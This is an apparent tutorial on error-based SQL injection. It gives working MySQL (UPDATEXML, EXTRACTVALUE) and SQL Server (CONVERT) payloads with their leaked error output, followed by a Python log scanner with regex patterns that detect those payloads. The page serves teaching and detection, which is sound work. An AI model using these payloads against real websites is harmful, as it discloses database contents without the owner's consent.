Error-Based SQL Injection
Error-based SQLi is an in-band injection technique that relies on forcing the database to generate an error message that contains sensitive information. This is possible when the application is configured to display database errors directly to the user.
When to Use Error-Based SQLi
- When a UNION-based attack is not possible (e.g., the query is not a SELECT statement).
- When the application displays detailed database errors but does not return query results in the page.
Methodology and Payloads
The goal is to execute a subquery that retrieves sensitive data and then pass its result to a function that will cause an error, embedding the data in the error message.
MySQL (UPDATEXML and EXTRACTVALUE)
The UPDATEXML and EXTRACTVALUE functions in MySQL take an XML string and an XPath expression. If the XPath expression is invalid, MySQL echoes the offending expression back in the error message, so any data concatenated into that expression is disclosed along with it.
Vulnerable URL: http://example.com/items.php?id=1
Payload using UPDATEXML:
-- The CONCAT function creates an invalid XPath character (~) followed by our subquery result.
' AND (UPDATEXML(1, CONCAT(0x7e, (SELECT @@version)), 1))--
Error message returned:
XPATH syntax error: '~5.7.24-0ubuntu0.18.04.1'
Payload using EXTRACTVALUE:
' AND (EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()))))--
Error message returned:
XPATH syntax error: '~webapp_db'
Microsoft SQL Server (CONVERT)
This technique converts the result of a subquery to a data type it cannot hold (here, a version string to int). The conversion fails, and SQL Server's error message quotes the value it could not convert.
Payload:
' AND 1=CONVERT(int, (SELECT @@version))--
Error message returned:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server ...' to data type int.
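From the detection side, the request shapes and error strings above are distinctive. The following is an added example (not part of the original page) that scans constructed Apache-style access-log lines for the UPDATEXML/EXTRACTVALUE and CONVERT payload patterns, and checks response bodies for the two leaked error messages; the log lines, IPs and function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Request signatures for the two techniques on this page: MySQL XPath functions fed
# a CONCAT(), and MSSQL CONVERT(int, ...) wrapping a subquery.
REQUEST_PATTERNS = {
    "mysql_xpath_error": re.compile(
        r"\b(UPDATEXML|EXTRACTVALUE)\s*\(.*CONCAT\s*\(", re.IGNORECASE | re.DOTALL),
    "mssql_convert_error": re.compile(
        r"\bCONVERT\s*\(\s*int\s*,\s*\(?\s*SELECT\b", re.IGNORECASE | re.DOTALL),
}

# Response signatures: if these reach the client, database errors are being displayed.
RESPONSE_PATTERNS = {
    "mysql_xpath_leak": re.compile(r"XPATH syntax error: '", re.IGNORECASE),
    "mssql_convert_leak": re.compile(
        r"Conversion failed when converting the \w+ value", re.IGNORECASE),
}

def classify_request(raw_url):
    """Return the names of request signatures matching a URL-decoded request."""
    decoded = unquote_plus(unquote_plus(raw_url))  # second pass catches double encoding
    return [name for name, pat in REQUEST_PATTERNS.items() if pat.search(decoded)]

def classify_response(body):
    """Return the names of leaked-error signatures found in a response body."""
    return [name for name, pat in RESPONSE_PATTERNS.items() if pat.search(body)]

# Apache combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan_access_log(lines):
    """Return one finding per log line whose request matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        hits = classify_request(url)
        if hits:
            findings.append({"ip": ip, "url": url, "status": int(status), "hits": hits})
    return findings

# Constructed sample lines (not real traffic): the page's two payload shapes plus one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /items.php?id=1%27%20AND%20(UPDATEXML(1,CONCAT(0x7e,(SELECT%20@@version)),1))-- HTTP/1.1" 500 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /items.php?id=1%27%20AND%201%3DCONVERT(int,(SELECT%20@@version))-- HTTP/1.1" 500 498',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /items.php?id=42 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Pairing a flagged request with a 500 status or a leaked-error response match is a strong indicator that the error display described above is enabled and should be turned off.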